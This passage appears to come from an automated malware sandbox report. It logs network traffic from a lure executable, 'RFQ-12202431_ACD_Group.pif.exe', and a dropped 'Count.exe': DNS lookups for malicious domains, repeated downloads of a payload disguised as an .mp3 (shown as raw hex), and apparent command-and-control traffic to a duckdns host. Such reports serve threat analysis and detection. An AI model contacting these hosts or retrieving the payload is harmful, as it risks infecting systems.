Jan 3, 2025 02:01:22.127371073 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.127372026 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.127429008 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.127742052 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:22.127921104 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.127921104 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.127960920 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.128628969 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:22.128840923 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.128840923 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.128895998 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.129292011 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:22.129492998 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.129492998 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.129537106 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.129956007 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:22.130117893 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.130117893 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.130167007 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.130947113 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:22.131135941 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.131135941 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.131181002 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.131551981 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:22.131767035 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.131767035 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.131814957 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.132289886 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:22.132466078 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.132466078 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.132512093 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.133019924 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:22.133196115 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.133196115 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.133239985 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.133760929 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:22.133971930 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.133971930 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.134516001 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:22.134712934 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.134712934 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.134757996 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.134933949 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:22.135097980 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:22.135145903 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.135260105 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:22.135678053 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:41.560234070 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:01:41.601738930 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:42.158330917 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:01:42.210952997 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:42.945333004 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:01:42.945466995 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:49.116822958 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:49.649070978 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:01:49.649197102 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:49.955476999 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:01:50.006102085 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:50.300100088 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:01:50.303836107 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:50.690015078 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:01:50.690246105 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:51.038049936 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:04.575706005 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:04.627933979 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:02:05.083194017 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:05.127873898 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:02:19.125260115 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:02:19.485246897 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:19.485394955 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:02:19.846348047 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:21.979006052 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:22.030432940 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:02:22.501420021 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:22.503706932 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:02:23.014658928 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:02:23.260179043 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:23.260361910 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:02:23.365799904 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:23.746315956 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:27.626041889 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:27.669958115 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:02:27.963666916 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:28.013497114 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:02:49.138956070 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:02:49.486107111 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:49.486296892 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:02:49.833261967 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:49.883810043 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:02:50.192226887 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:50.193686962 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:02:50.538465023 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:02:50.538650036 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:02:50.932338953 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:03:04.672964096 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:03:05.031626940 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:03:05.031778097 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:03:05.326992989 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:03:05.380459070 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:03:05.674401045 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:03:05.674942970 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:03:06.019362926 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:03:06.019526958 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:03:06.375685930 CET	50787	49775	193.187.91.218	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 02:00:58.778698921 CET	54725	53	192.168.11.20	1.1.1.1
Jan 3, 2025 02:00:59.149446011 CET	53	54725	1.1.1.1	192.168.11.20
Jan 3, 2025 02:01:17.180939913 CET	63691	53	192.168.11.20	1.1.1.1
Jan 3, 2025 02:01:17.861542940 CET	53	63691	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2025 02:00:58.778698921 CET	192.168.11.20	1.1.1.1	0xf81	Standard query (0)	www.chirreeirl.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 02:01:17.180939913 CET	192.168.11.20	1.1.1.1	0x58d6	Standard query (0)	pureeratee.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 3, 2025 02:00:59.149446011 CET	1.1.1.1	192.168.11.20	0xf81	No error (0)	www.chirreeirl.com	chirreeirl.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 3, 2025 02:00:59.149446011 CET	1.1.1.1	192.168.11.20	0xf81	No error (0)	chirreeirl.com		209.58.149.225	A (IP address)	IN (0x0001)	false
Jan 3, 2025 02:01:17.861542940 CET	1.1.1.1	192.168.11.20	0x58d6	No error (0)	pureeratee.duckdns.org		193.187.91.218	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.chirreeirl.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49774	209.58.149.225	443	3052	C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 01:00:59 UTC	222	OUT	GET /wp-panel/uploads/Wlvdlivs.mp3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Host: www.chirreeirl.com Connection: Keep-Alive
2025-01-03 01:00:59 UTC	210	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 01:00:59 GMT Server: Apache Last-Modified: Thu, 02 Jan 2025 18:16:45 GMT Accept-Ranges: bytes Content-Length: 1262600 Connection: close Content-Type: audio/mpeg
2025-01-03 01:00:59 UTC	7982	IN	Data Raw: 0c da 08 45 20 57 84 8a 02 40 d1 79 5a 3a 6b c6 b1 be 7e a2 c3 d8 bb e1 0f 22 ca e1 14 d4 ad 7c 96 ba 37 91 55 31 69 b0 28 e1 85 79 93 6a 5e 7f 04 41 e3 13 f7 11 f1 17 87 f0 26 41 69 3b c3 0d 2e 87 4f 08 47 a9 ed e1 b7 a4 3a 6c b2 0e f1 b9 73 7b f9 1c 5d 77 4f 28 71 0d 97 3f 48 1b 91 97 59 68 26 ad b2 fb bf 3a 1d d3 9d 2f 48 1a 9c 75 e1 ee ba 37 fc f2 61 dc e5 b3 11 b8 f7 8c 83 b5 cf 48 48 13 50 16 5c 64 b1 74 5f 92 12 1c f2 97 2d a0 45 0d 40 4a 15 cc b1 b7 02 48 a6 1d d7 2e 3f 68 88 80 57 d4 b9 e2 f9 4f 5c ed c3 a4 84 e7 53 64 d2 e5 f0 0c 69 a3 f0 d8 3b ea b2 e0 73 07 9d 12 c7 c3 e4 f3 77 52 d7 da d3 a4 ca 22 fb 62 90 da ed 71 e5 1f 5e 01 d5 38 41 a9 c2 1f e1 06 6b 57 a0 e9 77 33 b8 a6 bd 82 93 66 88 ff be 61 32 92 42 da d3 d6 b4 5d 74 f8 f6 df c0 6b ac Data Ascii: E W@yZ:k~"\|7U1i(yj^A&Ai;.OG:ls{]wO(q?HYh&:/Hu7aHHP\dt_-E@JH.?hWO\Sdi;swR"bq^8AkWw3fa2B]tk
2025-01-03 01:00:59 UTC	8000	IN	Data Raw: 0e 8d f6 28 f2 64 49 4f 3c 88 2f 45 4b f2 dc 9b 4f 8c bc 5c ac c5 96 b7 5e 29 ad 5b 87 f7 31 e0 d6 a0 4a 23 e7 2a 3b ae d7 86 6e 4d be f1 09 8c 3c f7 be ac dd cc f6 b5 3b 59 fc ba ea 20 8a a5 8e 37 aa 49 da 95 6a e8 2d c5 d2 0a fc 61 62 f4 d2 c6 9b e6 89 2a a0 fc 51 aa cc 80 9b ce e4 15 2f c7 2b 0f c8 ce 8a 3c 41 d0 ed 47 59 3a 58 89 49 d7 05 83 35 bc 7b 61 bf e9 b1 88 6b d7 c5 c2 18 5d 70 c3 51 5a 49 05 9c e1 5d 43 c2 6e 4a d0 6c 1a e9 da e1 44 2e 8f cd 53 c5 f8 5a c8 48 e7 10 e3 68 43 ce 7c 0b 51 0e 56 5c d3 2c 87 7b a7 c0 b5 dd b9 a2 8f ce 7f bf 11 10 fd 7a 01 d6 04 01 d2 c5 03 27 12 32 03 72 3a 6e cf 8d a1 1f 44 b8 42 60 9e 69 84 ab ed f3 f4 89 18 9f e9 b9 4c 63 43 10 cb 10 73 18 41 c1 94 19 04 8c 05 34 bd b2 4a 3a 5a a0 c0 07 20 16 20 cb 66 de d0 78 Data Ascii: (dIO</EKO\^)[1J#;nM<;Y 7Ij-abQ/+<AGY:XI5{ak]pQZI]CnJlD.SZHhC\|QV\,{z'2r:nDB`iLcCsA4J:Z fx
2025-01-03 01:00:59 UTC	8000	IN	Data Raw: 21 4d 2d ea 1f 87 b9 54 b6 3c 26 8d 02 15 9d 0a 83 b7 27 93 09 d5 ec 58 1a a2 08 56 e1 94 31 f3 d9 58 3b 55 2f b6 d3 25 e9 84 da 5d 37 a5 e8 e9 5f 34 a1 49 e9 de 14 dc d1 3a 32 ee d5 79 62 23 eb 2b 1b 7e 84 1d ab 73 22 0a e2 a7 2b 44 5e 20 0d 08 81 16 df fe c0 cd 1d 0c 78 28 d1 a3 83 27 4d 2d 49 9d 71 91 00 ad e2 a7 0b c6 61 7e e9 17 f2 77 4f 92 57 34 18 09 d4 27 48 27 94 af 95 8b d4 03 f1 99 96 9c a3 0c b1 67 60 74 89 a9 65 1f 90 51 79 0e c6 48 1f 8c 4b 87 0c 67 ff ff 6d 18 e3 e5 3b c8 f9 0c 1a 65 ea 8e b5 92 66 87 d9 58 94 70 54 74 6d b9 44 d9 4d 13 80 9a 47 88 5e dc 86 e7 a5 76 b3 48 ba 94 54 82 7a 63 67 43 6e 3c 7b f8 27 3e 3d 35 d4 27 c6 eb 83 f0 d7 2a dd 02 f5 af 9c 2e 6e c4 db 8f 4f 49 e9 8c 07 39 76 0c 81 2c 5a 6e 95 95 d4 30 2a e3 3f eb 40 ad e8 Data Ascii: !M-T<&'XV1X;U/%]7_4I:2yb#+~s"+D^ x('M-Iqa~wOW4'H'g`teQyHKgm;efXpTtmDMG^vHTzcgCn<{'>=5'.nOI9v,Zn0?@
2025-01-03 01:00:59 UTC	8000	IN	Data Raw: 5f 2d c6 9c 24 54 3d d2 29 13 48 1f 83 e6 3f 03 03 f0 dc 6f 04 81 c5 86 f4 9e a3 11 f5 6f d8 22 6d b2 0d cd fb b6 0a 0c 7b 7a 38 77 5b 21 0e 43 35 ad dd f5 be 47 4a 33 49 9a a8 16 8e e5 38 13 97 78 da a7 76 d2 de 25 7c db 71 b2 e5 d2 5e a0 ff be 38 a4 82 7e aa 76 7d df 2f f7 e4 c1 8a f8 20 78 a2 f2 0e 26 11 c7 82 42 d5 47 a7 5f 86 b2 f4 de ac 0a 26 d3 a2 73 33 bf f1 2f 06 f2 f5 68 b0 64 96 5d 34 5c 03 8d be 59 1b 89 74 11 e8 4d f5 10 5a 57 9a 03 bc f5 b8 27 b6 51 99 b3 f6 f4 e9 5b f6 f0 c4 12 f0 7e b8 83 6d 63 0a 52 80 40 cd 43 1e 05 0b 13 24 e9 f4 7d 7e 00 0d 0b c1 be 85 37 ba 13 39 8f c0 d2 76 80 f9 ac 37 1d d1 44 05 37 7a 96 98 49 9d e3 b2 83 59 d7 30 fc 1c 95 df d5 92 e3 a9 d2 74 c0 02 ca 85 b3 04 db b3 b0 7c 65 83 90 aa ba 7a 01 99 a5 ca 0e 05 e9 07 Data Ascii: _-$T=)H?oo"m{z8w[!C5GJ3I8xv%\|q^8~v}/ x&BG_&s3/hd]4\YtMZW'Q[~mcR@C$}~79v7D7zIY0t\|ez
2025-01-03 01:00:59 UTC	8000	IN	Data Raw: 69 fc d7 4d 05 10 7f 07 ee 4c 38 e9 a9 4a 9b 14 e1 7d 2c df 77 3b 27 7e 2b 2f 44 c5 68 8b da d1 95 44 fd 40 28 d0 93 e0 ef 76 67 62 3a cd f1 55 0a 61 46 6c 7d 3f 37 e8 64 41 f8 5b 42 be 9f 0d 6e 1f 5d 84 2a 65 d1 d8 8c 85 21 e9 d8 eb 7a b7 bd de 6f 04 a3 ad 76 62 3b 55 21 7d e7 f4 6b 22 35 cc b1 d1 1f 4a 94 cc 33 2d 1a a3 5e 0e b0 70 d4 82 2f fe 8f a7 a0 04 30 3c e4 47 ea 59 9b 91 2e eb ce 22 54 ee 93 d5 43 38 a0 de b2 d0 79 52 be cb a7 b7 59 d1 2c 47 00 3f fe 2c d9 b2 c5 62 33 b8 63 c2 9d 32 f3 0c eb 99 a6 0b d6 ab 56 66 18 54 6f 53 c2 27 73 c0 36 c8 25 9a a7 d4 39 48 5c 4b b1 0e 1d 24 84 ef db f7 35 8a f2 ef 8a a9 4c 2d a8 09 d6 32 10 61 6d 53 14 9d e8 98 16 30 6a f7 36 e2 e0 b1 1e 47 0d f8 42 bf ae 1f 9c ec f8 ee 43 fd 26 9a 04 f2 a4 fb 1c 3d 7f 92 28 Data Ascii: iML8J},w;'~+/DhD@(vgb:UaFl}?7dA[Bn]*e!zovb;U!}k"5J3-^p/0<GY."TC8yRY,G?,b3c2VfToS's6%9H\K$5L-2amS0j6GBC&=(
2025-01-03 01:01:00 UTC	8000	IN	Data Raw: af 62 b5 07 93 0e 92 d9 94 b6 93 68 79 fa ab 5d 10 7a 21 80 6f b0 04 1f 38 d0 80 63 ce 64 1d ed f6 31 78 28 aa 69 f5 01 89 5e 6c ca e6 d5 b8 91 16 9c 13 b8 4d 6f 63 2c 68 e4 55 c8 c8 9b 40 8d 0a 28 25 37 ce 93 d6 eb 6b 5c 16 fc a8 eb be 6b f6 da 50 6d 6f b9 5a 88 cb 77 1f ea 4d 49 12 12 89 97 80 d6 cb e0 c5 c6 b5 54 55 45 01 13 45 6f 9b 8b 32 b6 3a 9b 2f d0 e9 23 3d fc eb 18 93 48 6d ad f3 21 b1 a7 c4 c5 43 00 c5 7f a2 62 13 3f 2f b1 e2 b5 d8 ec 39 5e 14 ed f0 f8 43 a3 65 fa 5e fa 86 05 55 1c ce 5c 36 57 f4 0b 0e 1a bb ea 31 6a 29 6f 81 4d ec cd a2 b5 aa 8d 30 9f 1e 16 98 a2 91 e0 11 48 0e ff ed bd f6 fb 14 21 65 b2 05 14 f5 3f 38 9c 1c 77 49 7e 43 69 36 d5 fa 46 e8 7c ef 87 9f 2a 48 97 11 fe 93 2c c7 31 8c 43 47 06 4f 4b 2d 2b cd 53 a5 52 88 a1 d6 83 ea Data Ascii: bhy]z!o8cd1x(i^lMoc,hU@(%7k\kPmoZwMITUEEo2:/#=Hm!Cb?/9^Ce^U\6W1j)oM0H!e?8wI~Ci6F\|*H,1CGOK-+SR
2025-01-03 01:01:00 UTC	8000	IN	Data Raw: b9 6b e6 31 e8 9b 88 e5 ea 3c 03 62 d8 f1 e5 9f 77 c2 6d 47 f7 4c 12 63 c9 4a 07 19 21 d3 1e 48 09 9a 96 bb 58 74 aa 2c 76 72 ce 8c 8c 33 21 79 ba bf 7d cc 92 77 b1 8f dd d7 15 c1 3c 31 5f fc 90 9a 3d 4a 32 72 c9 6f 6d d3 40 c8 ad 34 69 ff 5d e6 60 79 4a 8e ee 59 90 7b 1c b5 2c 23 ba bf 29 87 b0 29 05 79 19 70 71 c7 1f e7 66 d4 b8 36 4e f8 cd 86 d3 c5 e3 19 77 a3 6d 9f aa fb cd 89 85 6c 9f cd 20 6b 83 9e 93 b3 04 a7 df 94 34 89 a2 33 92 93 6e 7c 0d fc 95 02 c0 4c 5e b2 69 c8 ef 5c 6b b7 c1 4b 8b aa e4 d4 aa 11 ad 4b f0 c0 72 e6 e0 b8 6d d2 d7 ca f3 15 e7 bc cf 03 39 09 1e 5a 4b 94 be 71 22 99 4a f6 90 6f 8b 10 b7 01 c5 69 2c ab a1 03 cc 29 18 d5 b9 99 33 a4 12 36 7d 47 a4 a7 96 43 9d 98 cf 70 bb c3 ea cb 51 ec 0a 67 e2 6b 32 b6 f0 0c 93 67 9a 86 c0 4f b5 Data Ascii: k1<bwmGLcJ!HXt,vr3!y}w<1_=J2rom@4i]`yJY{,#))ypqf6Nwml k43n\|L^i\kKKrm9ZKq"Joi,)36}GCpQgk2gO
2025-01-03 01:01:00 UTC	8000	IN	Data Raw: 60 25 52 7c 03 b1 78 52 56 47 d4 03 34 37 b9 be 6b 5f 32 54 69 33 e0 b4 f5 23 38 2b 7b 69 3d 7f 38 27 bb 18 74 eb 83 76 71 98 1a 9d 6a 2b 76 7a c4 7d df 1c 69 04 ad 29 09 38 62 fb f4 c2 65 d1 b1 48 4f d2 c5 fe aa 4f d1 a4 2d be e5 17 80 04 aa a9 46 65 f0 e0 12 f5 11 96 81 f3 d6 c2 46 d4 1d d0 e1 7e 41 c7 04 de 13 de 02 e4 86 b2 b8 30 74 e4 a8 6f 02 a7 b9 a4 62 c2 97 ba 58 de d0 a7 0c 23 09 6b 79 bc 21 55 28 e3 e9 bd 92 b3 58 ed ba a8 3e ec 38 00 c0 ca 84 60 b9 f6 c3 a7 6e 99 66 4a 50 aa 7a a8 ff 74 51 f4 af eb ff 71 e4 e8 86 05 c0 3d c0 c3 8a ea 52 c1 00 a9 0c f5 34 ff 66 e6 c9 51 5a ec 8f 2a 32 4b 15 a5 b7 75 d6 a8 25 1e 26 a5 7c ea b7 28 e5 5e c2 fc 4b 5c 64 ae 8f ec cb aa 7f 8d f6 2f f8 fe 16 f0 bd d4 4e 5b d7 52 e9 a4 d9 31 89 ba 73 57 c9 57 ce 40 5e Data Ascii: `%R\|xRVG47k_2Ti3#8+{i=8'tvqj+vz}i)8beHOO-FeF~A0tobX#ky!U(X>8`nfJPztQq=R4fQZ*2Ku%&\|(^K\d/N[R1sWW@^
2025-01-03 01:01:00 UTC	8000	IN	Data Raw: 09 b1 b2 75 fe a4 e7 cd e0 79 ca 67 45 84 b6 80 0b c8 c0 73 00 76 2d 45 d5 c5 c5 7b b0 22 81 20 58 e0 50 9e a3 1a c8 bd 15 f2 07 3e d1 13 72 7d a2 53 3f cf db 92 7c fc fc ac ad d7 4c f3 5e d0 61 7a 0b 84 20 a9 84 87 00 ab 25 17 40 0d cf e0 ab 74 35 b8 04 61 67 db b9 25 a8 49 1f bb 4c e2 84 78 57 3a 04 71 bf fe 83 e4 b4 6f b4 a8 6a 87 1a 8e d7 67 a3 55 f8 a2 16 0b d7 9d 08 04 14 ee 34 7e 6f f1 d7 b2 f3 32 20 1f 28 79 b1 2f e5 d2 21 70 08 77 a3 d1 e9 3d 39 fa 38 a7 dd ed f3 bf d8 cb d7 af e1 35 d6 40 12 98 53 96 38 b3 ab 4d 2f 50 03 33 d1 c5 8c 84 20 6c f7 dc 42 4e 68 c5 00 d4 ba fc bd fd 0b 8d 7a a5 64 37 4a ff 64 f1 08 e7 d8 11 de 36 f4 69 b5 f8 6f 4d 46 6d c9 44 a7 ed 5d 98 2b dc ee a7 cd b2 cf 00 03 d1 74 d5 a3 67 29 2d 3b fe 6e 1b 4c 96 59 6e 23 2f be Data Ascii: uygEsv-E{" XP>r}S?\|L^az %@t5ag%ILxW:qojgU4~o2 (y/!pw=985@S8M/P3 lBNhzd7Jd6ioMFmD]+tg)-;nLYn#/
2025-01-03 01:01:00 UTC	8000	IN	Data Raw: 86 ad 83 41 2f b3 ed 44 55 54 6a 9d 8d 2b 55 27 ee da c4 e1 81 3e dd 84 8c e2 61 ae 66 75 7a 9b 7f 06 b2 63 34 a0 b7 07 5e 2a ab 89 8a b1 57 3a fb 7d 67 e1 3f 11 e2 78 c6 28 b8 9f 37 a7 e8 15 6a b5 e9 59 33 60 e0 c3 24 a3 46 7d cc cf c2 18 e5 c1 75 ce b0 98 87 51 94 2d 66 63 76 86 dc 52 b0 82 7e 76 f0 14 84 bb 9a e0 45 ca 8d e5 15 a9 01 f5 9e dd ac b4 c8 88 8f 43 2e ce ee 67 7b 75 d0 76 f6 d1 95 c0 38 74 2e ad 64 34 ba 37 91 1d a3 17 0e f1 dd 79 f1 f5 ff 7e 78 7d 39 b1 a1 b2 18 8c d5 e3 17 94 96 c6 c3 24 4c 38 fa fc 8d 10 2b be 34 83 3b dd 36 1b 06 1c 5a a1 a4 d0 f1 a1 77 c7 85 5a 4b 30 6e 55 8b 59 fb 03 1b 25 a7 1c 2d 17 d6 5c 06 55 e0 f4 e7 f4 c8 3b 0d 92 28 dd 8f 0c e8 8e 09 87 42 50 61 27 6c 03 0e 4f f3 25 51 78 60 44 b8 0b 50 83 2b 9d 79 7b 7c 3b 22 Data Ascii: A/DUTj+U'>afuzc4^*W:}g?x(7jY3`$F}uQ-fcvR~vEC.g{uv8t.d47y~x}9$L8+4;6ZwZK0nUY%-\U;(BPa'lO%Qx`DP+y{\|;"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49776	209.58.149.225	443	1648	C:\Users\user\AppData\Roaming\Count.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 01:01:20 UTC	222	OUT	GET /wp-panel/uploads/Wlvdlivs.mp3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Host: www.chirreeirl.com Connection: Keep-Alive
2025-01-03 01:01:21 UTC	210	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 01:01:21 GMT Server: Apache Last-Modified: Thu, 02 Jan 2025 18:16:45 GMT Accept-Ranges: bytes Content-Length: 1262600 Connection: close Content-Type: audio/mpeg
2025-01-03 01:01:21 UTC	7982	IN	Data Raw: 0c da 08 45 20 57 84 8a 02 40 d1 79 5a 3a 6b c6 b1 be 7e a2 c3 d8 bb e1 0f 22 ca e1 14 d4 ad 7c 96 ba 37 91 55 31 69 b0 28 e1 85 79 93 6a 5e 7f 04 41 e3 13 f7 11 f1 17 87 f0 26 41 69 3b c3 0d 2e 87 4f 08 47 a9 ed e1 b7 a4 3a 6c b2 0e f1 b9 73 7b f9 1c 5d 77 4f 28 71 0d 97 3f 48 1b 91 97 59 68 26 ad b2 fb bf 3a 1d d3 9d 2f 48 1a 9c 75 e1 ee ba 37 fc f2 61 dc e5 b3 11 b8 f7 8c 83 b5 cf 48 48 13 50 16 5c 64 b1 74 5f 92 12 1c f2 97 2d a0 45 0d 40 4a 15 cc b1 b7 02 48 a6 1d d7 2e 3f 68 88 80 57 d4 b9 e2 f9 4f 5c ed c3 a4 84 e7 53 64 d2 e5 f0 0c 69 a3 f0 d8 3b ea b2 e0 73 07 9d 12 c7 c3 e4 f3 77 52 d7 da d3 a4 ca 22 fb 62 90 da ed 71 e5 1f 5e 01 d5 38 41 a9 c2 1f e1 06 6b 57 a0 e9 77 33 b8 a6 bd 82 93 66 88 ff be 61 32 92 42 da d3 d6 b4 5d 74 f8 f6 df c0 6b ac Data Ascii: E W@yZ:k~"\|7U1i(yj^A&Ai;.OG:ls{]wO(q?HYh&:/Hu7aHHP\dt_-E@JH.?hWO\Sdi;swR"bq^8AkWw3fa2B]tk
